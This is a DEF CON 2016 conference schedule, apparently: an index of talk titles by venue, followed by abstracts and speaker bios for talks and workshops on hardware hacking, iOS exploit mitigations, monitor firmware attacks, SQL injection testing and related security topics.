Workshops-Las Vegas Ballroom 1-Operation Dark Tangent: The Def Con Messaging Protocol (DCMP)
SkyTalks-Skyview 3-Opps! I made a machine gun: The Progressive Lowering of the Barrier to Entry in Firearms Manufacturing
CPV-Bronze 2-Overview and evolution of password-based authentication schemes
Demolabs-Table 5-OWASP ZSC Shellcode
Demolabs-Table 2-OXML XXE
Workshops-Las Vegas Ballroom 6-PCB Design Crash Course: A primer to designing your own hacking tools.
Workshops-Las Vegas Ballroom 7-Pentesting ICS 101
DEFCON-DEF CON 101-Phishing without Failure and Frustration
Workshops-Las Vegas Ballroom 7-Physical Security for Computing Systems, a Look at Design, Attacks and Defenses
DEFCON-Track Three-Picking Bluetooth Low Energy Locks from a Quarter Mile Away
IOT-Bronze 4-Picking Bluetooth Low Energy Locks from a Quarter Mile Away
DEFCON-Track Two-pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle
Demolabs-Table 3-PKI for the People
DEFCON-Track Three-Platform Agnostic Kernel Fuzzing
DEFCON-Track Two-Playing Through the Pain? - The Impact of Secrets and Dark Knowledge
Workshops-Las Vegas Ballroom 1-Practical Android Application Exploitation
SkyTalks-Skyview 3-Practical Penetration Testing of Embedded Devices
CPV-Bronze 2-Practical Text-Based Steganography: Exfiltrating Data from Secure Networks and Socially Engineering SecOps Analysts [WORKSHOP]
Workshops-Las Vegas Ballroom 6-Pragmatic Cloud Security: Hands-On Turbocharged Edition
WOS-Skyview 6-Presenting Security Metrics to the Board / Leadership
CPV-Bronze 2-privacy by design - it's n0t that difficult
DEFCON-Track Two-Project CITL
DEFCON-DEF CON 101-Propaganda and you (and your devices)...
BHV-Skyview 4-Psychoactive Chemicals in Combat
BHV-Skyview 4-Psychoactive Chemicals in Combat
Ballys-Blu Pool-Queercon Pool Party - DJ Bret Law - Seattle
Workshops-Las Vegas Ballroom 4-Raspberry Pi and Kali Deluxe Spy workshop
Workshops-Las Vegas Ballroom 4-Raspberry Pi and Kali Deluxe Spy workshop
Workshops-Las Vegas Ballroom 3-Ready? Your Network is Being Pwned NOW!
DEFCON-DEF CON 101-Realtime bluetooth device detection with Blue Hydra
DEFCON-Track One-Research on the Machines: Help the FTC Protect Privacy & Security
DEFCON-Track One-Retweet to win: How 50 lines of Python made me the luckiest guy on Twitter
BHV-Skyview 4-Reverse engineering biological research equipment for fun and open science
IOT-Bronze 1-Reversing and Exploiting Embedded Devices
Wireless-Skyview 1-Reversing LoRa: Deconstructing a Next-Gen Proprietary LPWAN
BHV-Skyview 4-Reversing Your Own Source Code
BHV-Skyview 4-Reversing Your Own Source Code
CPV-Bronze 1-Revocation, the Frailty of PKI
BHV-Skyview 4-Rise of the Lovetron9000
SkyTalks-Skyview 3-Rotten to the core white box switching as the new abandonware
SkyTalks-Skyview 3-Saflok or Unsaflok, That is the Question
DEFCON-Track Two-Samsung Pay: Tokenized Numbers, Flaws and Issues
SE-Palace 2-5-SCAM CALL – Call Dropped
DEFCON-DEF CON 101-Secure Penetration Testing Operations: Demonstrated Weaknesses in Learning Material and Tools
CPV-Bronze 1-Security Logs Arent Enough: Logging for User Data Protection
IOT-Bronze 1-Sense & Avoid: Some laws to know before you break IoT
BHV-Skyview 4-Sensory Augmentation 101
BHV-Skyview 4-Sensory Augmentation 101
DEFCON-DEF CON 101-Sentient Storage - Do SSDs Have a Mind of Their Own?
DEFCON-Track Two-Side-channel attacks on high-security electronic safe locks
CPV-Bronze 1-Silicon Valley and DC talk about freedom, crypto, and the cybers
DEFCON-DEF CON 101-SITCH - Inexpensive, Coordinated GSM Anomaly Detection
DEFCON-Track One-Six Degrees of Domain Admin ...
DEFCON-Track Two-Sk3wlDbg: Emulating all (well many) of the things with Ida
SkyTalks-Skyview 3-Slack as Intelligence Collector or "how anime cons get weird"
Wireless-Skyview 1-Slaying Rogue Access Points with Python and Cheap Hardware
DEFCON-Track Two-Slouching Towards Utopia: The State of the Internet Dream
IOT-Bronze 1-SNMP and IoT Devices: Let me Manage that for you Bro!
DEFCON-DEF CON 101-So you think you want to be a penetration tester
CPV-Bronze 1-SSL Visibility, Uncovered
BHV-Skyview 4-Standardizing the Secure Deployment of Medical Devices
BHV-Skyview 4-Standardizing the Secure Deployment of Medical Devices
DEFCON-Track Two-Stargate: Pivoting Through VNC To Own Internal Networks
CPV-Bronze 2-State of the Curve - 2016
DEFCON-DEF CON 101-Sticky Keys To The Kingdom: Pre-auth RCE Is More Common Than You Think
DEFCON-Track One-Stumping the Mobile Chipset
CPV-Bronze 2-Tabletop Cryptography
Workshops-Las Vegas Ballroom 4-Taking a bite out of Apple
SkyTalks-Skyview 3-Taking Down Skynet (By Subverting the Command and Control Channel)
BHV-Skyview 4-Tales from a healthcare hacker
BHV-Skyview 4-Tales from a healthcare hacker
SkyTalks-Skyview 3-Tales from the Dongosphere: Lessons Learned Hosting Public Email for 4chan
IOT-Bronze 4-TBA
BHV-Skyview 4-tDCS workshop
BHV-Skyview 4-tDCS workshop
BHV-Skyview 4-The Bioethics of BioHacking
BHV-Skyview 4-The Bitcoin DNA Challenge
BHV-Skyview 4-The Bitcoin DNA Challenge
BHV-Skyview 4-The Brave New World of Bio-Entrepreneurship
BHV-Skyview 4-The Brave New World of Bio-Entrepreneurship
BHV-Skyview 4-The collision of prosthetics, robotics and the human interface
BHV-Skyview 4-The collision of prosthetics, robotics and the human interface
Wireless-Skyview 1-The Covert Cupid Under .11 Veil !!! /* Approach for Covert WIFI */
BHV-Skyview 4-The Era of Bio Big Data: Benefits and Challenges for Information Security, Health, the Economy, and National Security
BHV-Skyview 4-The Future is Fake Identities
BHV-Skyview 4-The Future is Fake Identities
Workshops-Las Vegas Ballroom 5-The In’s and Outs of Steganography
BHV-Skyview 4-The New White Hat Hacking: Computational Biology for the Good of Mankind
BHV-Skyview 4-The Next Big Thing in Bioterrorism
SkyTalks-Skyview 3-The next John Moses Browning will use GitHub
SkyTalks-Skyview 3-The other way to get a hairy hand; or, contracts for hackers
BHV-Skyview 4-The Patient as CEO
BHV-Skyview 4-The Patient as CEO
DEFCON-Track Three-The Remote Metamorphic Engine: Detecting, Evading, Attacking the AI and Reverse Engineering
BHV-Skyview 4-The Rise of Digital Medicine: At-home digital clinical research
BHV-Skyview 4-The Rise of Digital Medicine: At-home digital clinical research
CPV-Bronze 2-The State of HTTPS: securing web traffic is not what it used to be
SkyTalks-Skyview 3-The trials & tribulations of an infosec pro in the government sector
SE-Palace 2-5-The Wizard of Oz – Painting a reality through deception
IOT-Bronze 4-Thermostat Ransomware and Workshop
SkyTalks-Skyview 3-To Beat the Toaster, We Must Become the Toaster: How to Show A.I. Who's Boss in the Robot Apocalypse
BHV-Skyview 4-To Beat the Toaster, You Must Become the Toaster: How to Show AI Who's Boss in the Robot Apocalypse
WOS-Skyview 6-To Catch An APT: YARA
BHV-Skyview 4-Total Recall: Implanting Passwords in Cognitive Memory
BHV-Skyview 4-Total Recall: Implanting Passwords in Cognitive Memory
DEFCON-DEF CON 101-Toxic Proxies - Bypassing HTTPS & VPNs to pwn your online identity
IOT-Bronze 1-Tranewreck
BHV-Skyview 4-Trigraph: An Ethereum-based Teleradiology Application
BHV-Skyview 4-Trigraph: An Ethereum-based Teleradiology Application
DEFCON-Track Two-Universal Serial aBUSe: Remote physical access attacks
SE-Palace 2-5-US Interrogation Techniques and Social Engineering
Workshops-Las Vegas Ballroom 5-Use Microsoft Free Security Tools as a Ninja
DEFCON-Track Three-Use Their Machines Against Them: Loading Code with a Copier
WOS-Skyview 6-Verifying IPS Coverage Claims: Here's How
BHV-Skyview 4-Video Games Can Teach Science: ScienceGameCenter.org
Demolabs-Table 5-VirusTotalego
Demolabs-Table 4-Visual Network and File Forensics using Rudra
DEFCON-Track Three-VLAN hopping, ARP poisoning & MITM Attacks in Virtualized Environments
Workshops-Las Vegas Ballroom 3-VoIP Wars: The Live Workshop
DEFCON-DEF CON 101-Vulnerabilities 101: How to Launch or Improve Your Vulnerability Research Game
Workshops-Las Vegas Ballroom 2-Vulnerability Assessment & Exploitation of Crypto-Systems : A Bottom up Approach
DEFCON-DEF CON 101-Weaponize Your Feature Codes
DEFCON-Track One-Weaponizing Data Science for Social Engineering: Automated E2E spear phishing on Twitter
Demolabs-Table 6-WebSec: a cross platform large scale vulnerability scanner
BHV-Skyview 4-WELCOME TO BHV! Day 2
BHV-Skyview 4-WELCOME TO BHV! Day 2
BHV-Skyview 4-WELCOME TO BHV!
BHV-Skyview 4-WELCOME TO BHV!
BHV-Skyview 4-WELCOME TO THE LAST DAY OF BHV!
BHV-Skyview 4-WELCOME TO THE LAST DAY OF BHV!
SkyTalks-Skyview 3-What's Lurking Inside MP3 Files That Can Hurt You?
CPV-Bronze 2-When Privacy Goes Poof! Why It's Gone and Never Coming Back
HHV-Contest Area-Why Ham Radio (still!) in the age of the Internet? And other projects.
SkyTalks-Skyview 3-Why Snowden's Leaks Were Inevitable
Workshops-Las Vegas Ballroom 2-Windows Breakout and Privilege Escalation Workshop
HHV-Contest Area-Workshop-Hands on JTAG for Fun and Root Shells II
HHV-Contest Area-Workshop-Hands on JTAG for Fun and Root Shells II
Workshops-Las Vegas Ballroom 3-Writing Your First Exploit
Workshops-Las Vegas Ballroom 7-XSS Remediation: All the questions you were wise enough to ask, but your security team is too afraid to answer
SE-Palace 2-5-You are being manipulated.
WOS-Skyview 6-You Are Being Manipulated
Workshops-Las Vegas Ballroom 2-You CAN haz fun with with cars!
Talk/Event Descriptions
DEFCON - Track One - Saturday - 16:00-16:59
'Cyber' Who Done It?! Attribution Analysis Through Arrest History
Jake Kouns CISO, Risk Based Security
There have been over 20,000 data breaches disclosed exposing over 4.8 billion records, with over 4,000 breaches in 2015 alone. It is clear there is no slowdown at all and the state of security is embarrassing. The total cybercrime cost estimates have been astronomical and law enforcement has been struggling to track down even a fraction of the criminals, as usual.
Attribution in computer compromises continues to be a surprisingly complex task that ultimately isn’t definitive in most cases. Rather than focusing on learning from security issues and how companies can avoid these sorts of data breaches in the future, for most media outlets the main topic after a breach continues to be attribution. And if we are honest, the media have painted an "interesting" and varied picture of "hackers" over the years, many of which have caused collective groans or outright rage from the community.
The Arrest Tracker project was started in 2011 as a way to track arrests from all types of "cyber" (drink!) and hacking related incidents. This project aims to track computer intrusion incidents resulting in an arrest, detaining of a person or persons, seizure of goods, or other related activities that are directly linked to computer crimes.
The Arrest Tracker project currently has 936 arrests collected as of 4/23/2016. How does tracking this information help and what does the data tell us? A lot actually! Who is behind these data breaches and what are the demographics such as average age, gender, and nationality? Which day of the week are you most likely to be arrested? How many arrests lead to assisting authorities to arrest others? How many work by themselves versus part of a group? These observations, and a lot more, paint an interesting picture of the computer crime landscape.
Jake Kouns is the CISO for Risk Based Security that provides vulnerability and data breach intelligence. He has presented at many well-known security conferences including DEF CON , Black Hat, DerbyCon, FIRST, CanSecWest, RSA, SOURCE, SyScan and many more. He is the co-author of the book Information Technology Risk Management in Enterprise Environments, Wiley, 2010 and The Chief Information Security Officer, IT Governance, 2011. With all of that said, many people are shocked to find out that he has a CISO title, and many others can’t believe that he has been attending DEF CON since the good old days of Alexis Park!
Twitter: @jkouns
Risk Based Security
Return to Index
DEFCON - Track One - Friday - 16:00-16:59
Robot Hacks Video Games: How TASBot Exploits Consoles with Custom Controllers
Allan Cecil (dwangoAC) President, North Bay Linux User's Group
TASBot is an augmented Nintendo R.O.B. robot that can play video games without any of the button mashing limitations us humans have. By pretending to be a controller connected to a game console, TASBot triggers glitches and exploits weaknesses to execute arbitrary opcodes and rewrite games. This talk will cover how these exploits were found and will explore the idea that breaking video games using Tool-Assisted emulators can be a fun way to learn the basics of discovering security vulnerabilities. After a brief overview of video game emulators and the tools they offer, I'll show a live demo of how the high accuracy of these emulators makes it possible to create a frame-by-frame sequence of button presses accurate enough to produce the same results even on real hardware. After demonstrating beating a game quickly I'll show how the same tools can be used to find exploitable weaknesses in a game's code that can be used to trigger an Arbitrary Code Execution, ultimately treating the combination of buttons being pressed as opcodes. Using this ability, I'll execute a payload that will connect a console directly to the internet and will allow the audience to interact with it. An overview of some of the details that will be described in the talk can be found in an article I coauthored for the PoC||GTFO journal (Pokemon Plays Twitch, page 6 ).
Allan Cecil (dwangoAC) is the President of the North Bay Linux User's Group. He acts as an ambassador for Tasvideos.org, a website devoted to using emulators to complete video games as quickly as the hardware allows. He participates in Games Done Quick charity speedrunning marathons using TASBot to entertain viewers with never-before-seen glitches in games. By day, he is a senior engineer at Ciena Corporation working on OpenStack Network Functions Virtualization orchestration and Linux packet performance optimization testing.
Twitter: @MrTASBot
Twitch.TV: dwangoac
YouTube: dwangoac
Return to Index
CPV - Bronze 1 - Sunday - 12:00-13:00
Talk Title:
"My Usability Goes to 11": A Hacker's Guide to User Experience Research
Speaker Name, Employer or position:
Greg Norcie - Staff Technologist at Center for Democracy & Technology
Abstract:
Tor. PGP. OTR. We have privacy enhancing technologies (PETs), but when was the last time you used privacy software that just worked? Just like security cannot be an afterthought bolted on after the software is written, neither can usability. In this talk, we will discuss why usable PETs are important, why creating usable PETs is challenging, and conclude by describing a real usability evaluation of the Tor Browser Bundle, with a focus on how hackers can perform practical usability evaluations of their own, using tools from the fields of experimental psychology and behavioral economics.
Bio:
Greg Norcie is a Staff Technologist at the Center for Democracy and Technology. Before he dropped out of his PhD to move to DC and fight in the crypto wars, Greg was a PhD student doing usable security research at Indiana University, where performed the first peer reviewed lab study of the Tor Browser Bundles usability.
Social media links if provided:
@gregnorc
Return to Index
DEFCON - Track Two - Friday - 13:00-13:59
(Ab)using Smart Cities: The Dark Age of Modern Mobility
Matteo Beccaro CTO, Opposing Force
Matteo Collura Electronic Engineering Student, Politecnico di Torino
Since these last few years our world has been getting smarter and smarter. We may ask ourselves: what does smart mean? It is the possibility of building systems which are nodes of a more complex network, digitally connected to the internet and to the final users. Our cities are becoming one of those networks and over time more and more elements are getting connected to such network: from traffic lights to information signs, from traffic and surveillance cameras to transport systems.
This last element, also called as Smart Mobility is the subject of our analysis, divided in three sub-element, each one describing a different method of transport in our city: Private transport: for this method we analyze the smart alternatives aimed to make parking activity easy, hassle free and more convenient Shared transport: we focus our attention on those systems which are sharing transport vehicles. In particular we deal with bike sharing which seems to be the most wide spread system in European cities Public transport: object of our analysis for this section is the bus, metro and tram network The aim of our analysis is understanding the ecosystem which each element belongs to and performing a security evaluation of such system. In this way the most plausible attack and fraud scenarios are pointed out and the presence of proper security measures is checked.
All the details discussed here are collected from a sample city, but the same methodology and concept can be applied to most of the smart cities in the world.
Matteo Beccaro is a security researcher, enrolled in Computer Engineering at Politecnico of Turin. He's co-founder and CTO of Opposing Force s.r.l., the first Italian offensive physical security company. Matteo works and researches on network protocols, NFC and EACS security. He's been selected as speaker at some of most prestigious international conferences like: DEF CON 21, 30th Chaos Communication Congress (30C3), BlackHat USA Arsenal 2014, DEF CON 22 SkyTalks, BlackHat Europe 2014, TetCon 2015, DEF CON 23 e ZeroNights 2015. As Chief Technical Officer of Opposing Force, Matteo works on vulnerability research activities and building physical intrusion.
Twitter: @_bughardy_
Matteo Collura is a student of Electronic Engineering at Politecnico di Torino. He has been studying Wireless networks and in the last few years he focused on NFC and Bluetooth. He presented the results of a progressive work of research at several conferences: DEF CON 21 (Las Vegas, 2013), 30C3 (Hamburg 2013), DEF CON Skytalks (Las Vegas, 2014), BlackHat USA 2014 Arsenal (Las Vegas), DEF CON 23 (Las Vegas, 2015), ZeroNights 2015 (Moscow) . He is going to continue his studies with a MSc in Electronic Engineering , Systems and Controls.
Twitter: @eagle1753
Return to Index
SE - Palace 2-5 - Saturday - 17:00-17:55
Jayson Street
Jayson E. Street is an author of the “Dissecting the hack: Series”. Also the DEF CON Groups Global Coordinator. He has also spoken at DEF CON, DerbyCon, UCON and at several other ‘CONs and colleges on a variety of Information Security subjects. His life story can be found on Google under “Jayson E. Street” *He is a highly carbonated speaker who has partaken of Pizza from Beijing to Brazil. He does not expect anybody to still be reading this far but if they are please note he was chosen as one of Time’s persons of the year for 2006.
Return to Index
IOT - Bronze 4 - Sunday - 10:00-11:59
0-day Hunting - TBA
No description available
Return to Index
BHV - Skyview 4 - Saturday - 15:00-15:59
Speaker: Tarah
@tarah
About Tarah:
Bio pending.
Abstract:
As more and more people explore human-embedded technology such as subdermal RFID chips and magnetic implants, we must begin to engage with mainstream concerns about where humanity ends and technology begins. Where is the thin silicon line between humanity and cybernetics, and what do the major faiths of the world say regarding the possible diminution of the human soul in the presence of life-altering tech implants? Let’s explore the very real future choice between the hope of Nirvana in the afterlife, and the possibility of eternal Earthly existence as binary data.
Return to Index
DEFCON - DEF CON 101 - Friday - 16:00-16:59
101 Ways to Brick your Hardware
Joe FitzPatrick SecuringHardware.com
Joe Grand (Kingpin) Grand Idea Studio
Spend some time hacking hardware and you'll eventually render a piece of equipment unusable either by accident or intentionally. Between us, we've got decades of bricking experience that we'd like to share. We'll document the most common ways of temporarily or permanently damaging your hardware and ways to recover, if possible. We'll also talk about tips on how to avoid bricking your projects in the first place. If you're getting into hardware hacking and worried about messing something up, our stories will hopefully prevent you from experiencing the same horrors we did. If you're worried about an uprising of intelligent machines, the techniques discussed will help you disable their functionality and keep them down.
Joe FitzPatrick is an Instructor and Researcher at https://SecuringHardware.com. Joe has spent over a decade working on low-level silicon debug, security validation, and hardware penetration testing, and hardware security training. In between training and bricking hardware, Joe is busy developing new course content or working on contributions to the NSA Playset and other misdirected hardware projects.
Twitter: @securelyfitz
Joe Grand also known as Kingpin, is a computer engineer, hardware hacker, former DEF CON badge designer, runner, daddy, honorary doctor, TV host, member of L0pht Heavy Industries, and the proprietor of Grand Idea Studio.
Twitter: @joegrand
Return to Index
DEFCON - DEF CON 101 - Friday - 12:00-12:59
411: A framework for managing security alerts
Kai Zhong Application Security Engineer, Etsy
Kenneth Lee Senior Security Engineer, Etsy
Modern web applications generate a ton of logs. Suites like ELK (Elasticsearch, Logstash, Kibana) exist to help manage these logs, and more people are turning to them for their log analysis needs. These logs contain a treasure trove of information regarding bad actors on your site, but surfacing that information in a timely manner can be difficult. When Etsy moved over from Splunk to ELK in mid-2014, we realized that ELK lacked necessary functionality for real-time alerting. We needed a solution that would provide a robust means of querying ELK and enrich the data with additional context. We ended up creating our own framework to give us this functionality. We’ve named this open-source framework 411. We designed 411 as a solution for detecting and alerting on interesting anomalies and security events. The Security team at Etsy was interested in using this functionality to detect everything from XSS to monitoring for potential account compromises. First, we’ll start off with a discussion of what you should be logging into Elasticsearch. This is important to help you create useful, actionable alerts in 411. We’ll note a number of configuration tips and tricks to help you get the most out of your ELK cluster. From there, we’ll dive into 411’s features and how it allows the Etsy security team to work effectively. We’ll conclude with two demos of 411 in action. This presentation will show you several examples of useful searches you can build in 411 and how this data can be manipulated to generate clear, actionable alerts. We’ll demonstrate the built-in workflow for responding to alerts and how 411 allows you to pull up additional context as you work on an alert. Additionally, while much of our discussion will be centered around ELK, 411 can in fact be used with a variety of data sources (Several of these sources are built into 411). Whether you’re a newbie looking to learn more or a security veteran with an established system, 411 will help change the way you handle security alerts.
Kai is a security engineer at Etsy. At work, he fiddles around with security features, works on 411 and responds to the occasional bug bounty report. He went to NYU-Poly and got a degree in Computer Science, with a MS in Computer Security. In his free time, he enjoys reverse engineering, CTFs board games, starting yet another project that he’ll never finish and learning all the things.
Twitter: @sixhundredns
Kenneth Lee is a senior product security engineer at Etsy.com, working on everything from managing the bug bounty program to shattering the site with new vulnerabilities. Previously, Kenneth worked at FactSet Research Systems preventing The Hackers from stealing financial data. He went to Columbia and got an MS in computer science focusing on computer security. Between sweet hacks, Kenneth enjoys drinking tea and force feeding Etsy's operations team with Japanese chocolates.
Twitter: @kennysan
Return to Index
SE - Palace 2-5 - Friday - 18:00-18:55
Chris Hadnagy
Chris is the sole defender of those who do not want to hear Hornsby. His passion for SE is only match by his passion for the NoHornsby movement.
Return to Index
SkyTalks - Skyview 3 - Friday - 13:00-13:59
Speakers: Joseph, nephitejnf
Talk: A Guide to Outsmarting the Machines
In this talk well be exploring alternatives to traditional education and supplements to it. Joseph will be taking his experiences in education and give his observations and solutions to the holes in our current education system, because the machines should be the last of our problems. Well be taking the hacker spirit and putting it into education.
Return to Index
DEFCON - DEF CON 101 - Saturday - 16:00-16:59
A Journey Through Exploit Mitigation Techniques in iOS
Max Bazaliy Staff Engineer, Lookout
Over the past year, Apple has consistently added features to prevent exploitation of the iOS kernel. These features, while largely misunderstood, provide a path for understanding of the iOS security model going forward. This talk will examine the history of iOS’s exploit mitigations from iOS 8 to iOS 9.3 in order to teach important features of the architecture. This talk will cover various enhancements that stop attackers from dynamically modifying the functionality of system services, but also resulted in the defeat of all known exploitation through function hooking. Additionally, we will explore how the ability to use PLT interception and the use of direct memory overwrite are no longer options for exploit writers because of recent changes. Finally, we will cover the code-signing mechanism in depth, userland and kernel implementations and possible ways to bypass code-sign enforcement.
Max Bazaliy is a security researcher at Lookout. He has over 9 years of experience in the security research space. Max has experience in native code obfuscation, malware detection and iOS exploitation. Before joining Lookout Max was working in malware research and software protection areas, most recently at Bluebox Security. Currently he is focused on mobile security research, XNU and LLVM internals. Max holds a Master's degree in Computer Science.
Twitter: @mbazaliy
Return to Index
DEFCON - Track Two - Friday - 14:00-14:59
A Monitor Darkly: Reversing and Exploiting Ubiquitous On-Screen-Display Controllers in Modern Monitors
Ang Cui PHD, CEO & Chief Scientist, Red Balloon Security
Jatin Kataria Principal Research Scientist, Red Balloon Security
Francois Charbonneau Research Scientist, Red Balloon Security
There are multiple x86 processors in your monitor! OSD, or on-screen-display controllers are ubiquitous components in nearly all modern monitors. OSDs are typically used to generate simple menus on the monitor, allowing the user to change settings like brightness, contrast and input source. However, OSDs are effectively independent general-purpose computers that can: read the content of the screen, change arbitrary pixel values, and execute arbitrary code supplied through numerous control channels. We demonstrate multiple methods of loading and executing arbitrary code in a modern monitor and discuss the security implication of this novel attack vector.
We also present a thorough analysis of an OSD system used in common Dell monitors and discuss attack scenarios ranging from active screen content manipulation and screen content snooping to active data exfiltration using Funtenna-like techniques. We demonstrate a multi-stage monitor implant capable of loading arbitrary code and data encoded in specially crafted images and documents through active monitor snooping. This code infiltration technique can be implemented through a single pixel, or through subtle variations of a large number of pixels. We discuss a step-by-step walk-through of our hardware and software reverse-analysis process of the Dell monitor. We present three demonstrations of monitoring exploitation to show active screen snooping, active screen content manipulation and covert data exfiltration using Funtenna.
Lastly, we discuss realistic attack delivery mechanisms, show a prototype implementation of our attack using the USB Armory and outline potential attack mitigation options. We will release sample code related to this attack prior to the presentation date.
Dr. Ang Cui is the Founder and Chief Scientist of Red Balloon Security. Dr. Cui received his PhD from Columbia University in 2015. His doctoral dissertation, titled "Embedded System Security: A Software-based Approach", focused exclusively on scientific inquiries concerning the exploitation and defense embedded systems. Ang has focused on developing new technologies to defend embedded systems against exploitation. During the course of his research, he has uncovered a number of serious vulnerabilities within ubiquitous embedded devices like Cisco routers, HP printers and Cisco IP phones. Dr. Cui is also the author of FRAK and the inventor of Software Symbiote technology. Ang has received various awards on his work on reverse engineering commercial devices and is also the recipient of the Symantec Graduate Fellowship and was selected as a DARPA Riser in 2015.
Jatin Kataria is a Principal Research Scientist at Red Balloon Security. His research focus is on the defense and exploitation of embedded devices. Jatin earned his master’s degree from Columbia University and a bachelor’s degree from Delhi College of Engineering. Previously, he has worked as a System Software Developer at NVIDIA and as an Associate Software Engineer at Mcafee.
Francois Charbonneau is a embedded security researcher who spent the better part of his career working for the Canadian government until he got lost and wondered into New York City. He now works as a research scientist for Red Balloon Security where he lives a happy life, trying to make the world a more secure place, one embedded device at a time.
Return to Index
DEFCON - Track Two - Saturday - 17:00-17:59
Abusing Bleeding Edge Web Standards for AppSec Glory
Bryant Zadegan Application Security Advisor & Mentor, Mach37
Ryan Lester CEO & Chief Software Architect, Cyph
Through cooperation between browser vendors and standards bodies in the recent past, numerous standards have been created to enforce stronger client-side control for web applications. As web appsec practitioners continue to shift from mitigating vulnerabilities to implementing proactive controls, each new standard adds another layer of defense for attack patterns previously accepted as risks. With the most basic controls complete, attention is shifting toward mitigating more complex threats. As a result of the drive to control for these threats client-side, standards such as SubResource Integrity (SRI), Content Security Policy (CSP), and HTTP Public Key Pinning (HPKP) carry larger implementation risks than others such as HTTP Strict Transport Security (HSTS). Builders supporting legacy applications actively make trade-offs between implementing the latest standards versus accepting risks simply because of the increased risks newer web standards pose. In this talk, we'll strictly explore the risks posed by SRI, CSP, and HPKP; demonstrate effective mitigation strategies and compromises which may make these standards more accessible to builders and defenders supporting legacy applications; as well as examine emergent properties of standards such as HPKP to cover previously unforeseen scenarios. As a bonus for the breakers, we'll explore and demonstrate exploitations of the emergent risks in these more volatile standards, to include multiple vulnerabilities uncovered quite literally during our research for this talk (which will hopefully be mitigated by d-day).
Bryant Zadegan is an application security advisor and mentor at Mach37, a security accelerator focused on pouring substantial dollars into new security technologies. When not driving developers to embrace AppSec in continuous integration, Bryant punches holes in Amazon, Google, Reddit, etc. On days when he'd rather not touch computers, he's usually nowhere to be found near DC.
Twitter: @eganist
Keybase.io/bryant
Ryan Lester is the CEO and chief software architect for Cyph, a web-based one-click end-to-end-encrypted communications service funded in part by Mach37, Virginia's Center for Innovative Technology, and the Goel Fund. Since departing SpaceX, Ryan has dedicated the better part of a year and a half to the vision of accessible encrypted communication. Unsurprisingly, when he isn't working on building the logic for Cyph, he's usually looking for ways to break it.
Twitter: @theryanlester
Return to Index
SkyTalks - Skyview 3 - Saturday - 13:00-13:59
Speaker: Shaf Patel
Talk: Accessibility: A Creative Solution to Living Without Sight
In this presentation, I will be discussing the various methods blind and visually impaired people accomplish every day tasks, with an emphasis on technology, screen reading software and application design from a blind persons perspective. There will be live demos of screen reading software, OCR apps for smartphones, wearable devices and possibly mobility aids if there is time. There will also be a discussion on myths and stigmas relating to blindness, an audience Q&A regarding accommodating those with a visual impairment, and tips and tricks for those who develop applications to include accessibility in their core design.
Return to Index
SkyTalks - Skyview 3 - Sunday - 12:00-12:59
Speakers: Brain, Xian
Talk: Active Incident Response
During the Pacnet breach in 2015, we developed a method which differs from the usual IR process for targeted attacks, utilising what we have termed Full Spectrum Visibility and Targeted Containment which form like Voltron to create Active Incident Response. This method, utilising threat intelligence, hunting and establishing the basis for active defence gives incident responders the information the business needs to assess risk, and another avenue for actions to mitigate that risk. We will demonstrate, using examples from the Pacnet breach and follow-on waves, how Targeted Containment can be used during incident response, the visibility required, and explore actor TTPs, tools and activity associated with this campaign. Expect to see pcap decodes, command-line activity and actor typos.
Return to Index
WOS - Skyview 6 - Friday - 13:10-13:59
Adding Ramparts to Your Bastille: An Introduction to SELinux Hardening
Jay Beale, CTO, COO at InGuardians, Inc.
Has your first action when acquiring a Red Hat system been to deactivate SELinux? In this fast-paced talk, you'll learn how to investigate and understand an SELinux-enabled system, and how to configure it. You'll learn how to build a policy for a new program and modify one for an existing. Finally, you'll learn about the boolean on-off switches built into the system that keep you from having to modify policies at all. If you want a speedy challenge, bring a CentOS 7 system with the packages listed on http://www.inguardians.com/selinux/ installed.
Jay Beale (Twitter: @jaybeale) has created several security tools, including Bastille Linux/UNIX and the CIS Linux Scoring Tool, both of which have been used throughout industry and government. He has served as an invited speaker, program chair and trainer at many industry and government conferences, a columnist for Information Security Magazine, SecurityPortal and SecurityFocus, and a contributor to nine books, including those in his Open Source Security Series and the ‘Stealing the Network' series. Jay is a founder and the CTO of the information security consulting company InGuardians. He has taught Linux hardening classes since the year 2001, when he got his start at Black Hat.
Return to Index
Workshops - Las Vegas Ballroom 7 - Friday - 14:00-18:00
Advanced Blind SQL Injection Exploitation
David Caissy Web App Penetration Tester, Albero Solutions Inc.
SQL Injection (SQLi) vulnerabilities are the most common injection flaws found in web applications today, ranking number one in the OWASP Top 10 most critical web application security risks. When an attacker is able to find and exploit such a vulnerability, the end result is often disastrous: complete database downloaded, application backdoor created or even remote code execution. Suffice to say that penetration testers need to find these vulnerabilities before the bad guys do.
But vulnerability scanners and automated exploitation tools like sqlmap can only do so much when it comes to finding and exploiting SQLi vulnerabilities. While they do a good job for regular or error-based SQLi vulnerabilities, their success rate lowers drastically when blind SQLi is encountered, especially when time-based attacks are required. And if you need to be quiet on the network, most tools are just insanely noisy…
This course is designed to help penetration testers who have been using these tools to get to the next level, where finding and exploiting SQLi is no longer easy. When only a browser and notepad are available to you or when being quiet is critical, you will be glad you know this stuff.
- SQL crash course for hackers (15 min)
- Error-based SQL Injection (1h 15min)
- Bypassing login (demo)
- UNION exploitation techniques (exercise)
- Blind SQL Injection (2h 30min)
- Splitting and Balancing
- Boolean exploitation techniques (exercise)
- Time-based exploitation techniques (exercise)
Bonus exercise: Exploiting error-based SQLi and blind SQLi using sqlmap
David Caissy, M. Sc., OSCP, GWAPT, GPEN, GSEC, CISSP, CEH is a web application penetration tester with in-depth developer and IT Security background spanning over 16 years. He has extensive experience in conducting vulnerability assessments and penetration tests as well as providing training globally, amongst numerous other teaching engagements. He has worked for a central bank, the Department of National Defense, various government agencies and private companies. David has been teaching web application security in colleges, conferences and for many government agencies over the last 15 years.
Max Class Size: 55
Prerequisites for students: This course is for penetration testers who have used sqlmap and other automated tools before, but now want to go to the next level. Basic knowledge of the SQL language is required as well as a basic understanding of error-based SQL injection techniques.
Materials or Equipment students will need to bring to participate: Participants need to bring a laptop with VMWare Workstation/Player/Fusion or VirtualBox pre-installed. I will give them a virtual machine containing a vulnerable web application where they will be able to do the exercises.
Return to Index
SE - Palace 2-5 - Saturday - 20:00-20:55
Fadli Sidek
